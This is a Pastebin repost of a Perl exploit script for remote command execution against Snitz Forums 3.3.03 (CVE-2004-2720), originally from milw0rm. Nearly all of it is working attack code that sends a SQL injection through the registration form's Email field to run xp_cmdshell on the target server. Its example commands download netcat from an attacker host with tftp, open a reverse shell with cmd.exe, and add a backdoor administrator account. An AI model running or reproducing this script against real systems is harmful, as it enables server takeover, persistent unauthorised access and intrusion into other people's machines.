Advertisement
FlyFar

Snitz Forums 3.3.03 - Remote Command Execution - CVE-2004-2720

Jan 24th, 2024
1,292
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.39 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use Socket;
  4.  
  5. print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
  6. print "You accept full responsibility for your actions by using this script.\n";
  7. print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
  8.  
  9. print "\nWeb server? [www.enterthegame.com]: ";
  10. my $webserver = <STDIN>;
  11. chomp $webserver;
  12. if( $webserver eq "" )
  13. {
  14. $webserver = "www.enterthegame.com";
  15. }
  16.  
  17. print "\nWeb server port? [80]: ";
  18. my $port = <STDIN>;
  19. chomp $port;
  20. if( $port eq "" )
  21. {
  22. $port = 80;
  23. }
  24.  
  25. print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
  26. my $path = <STDIN>;
  27. chomp $path;
  28. if( $path eq "" )
  29. {
  30. $path = "/forum/register.asp";
  31. }
  32.  
  33. print "\nCommand to execute non-interactively\n";
  34. print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
  35. print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
  36. print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
  37. print "Your command: ";
  38. my $command = <STDIN>;
  39. chomp $command;
  40. $command =~ s/\ /\%20/g;
  41.  
  42. if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
  43. {
  44. print "Error connecting to $webserver\n";
  45. exit( 0 );
  46. }
  47. else
  48. {
  49. my $data1 = $path . "\?mode\=DoIt";
  50. my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
  51. my $length = length( $data2 );
  52.  
  53. print FILEHANDLE "POST $data1 HTTP/1.1\n";
  54. if( $port == 80 )
  55. {
  56. print FILEHANDLE "Host: $webserver\n";
  57. }
  58. else
  59. {
  60. print FILEHANDLE "Host: $webserver:$port\n";
  61. }
  62. print FILEHANDLE "Accept: */*\n";
  63. print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
  64. print FILEHANDLE "Keep-Alive: 300\n";
  65. print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
  66. print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
  67. print FILEHANDLE "Content-Length: $length\n\n";
  68. print FILEHANDLE "$data2";
  69.  
  70. print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
  71. print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
  72.  
  73. close( FILEHANDLE );
  74. }
  75.  
  76. sub open_TCP
  77. {
  78. my( $FS, $dest, $port ) = @_;
  79.  
  80. my $proto = getprotobyname( 'tcp' );
  81. socket( $FS, PF_INET, SOCK_STREAM, $proto );
  82. my $sin = sockaddr_in( $port, inet_aton( $dest ));
  83. connect( $FS, $sin ) || return undef;
  84.  
  85. my $old_fh = select( $FS );
  86. $| = 1;
  87. select( $old_fh );
  88. return 1;
  89. }
  90.  
  91. # milw0rm.com [2003-05-12]
  92.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement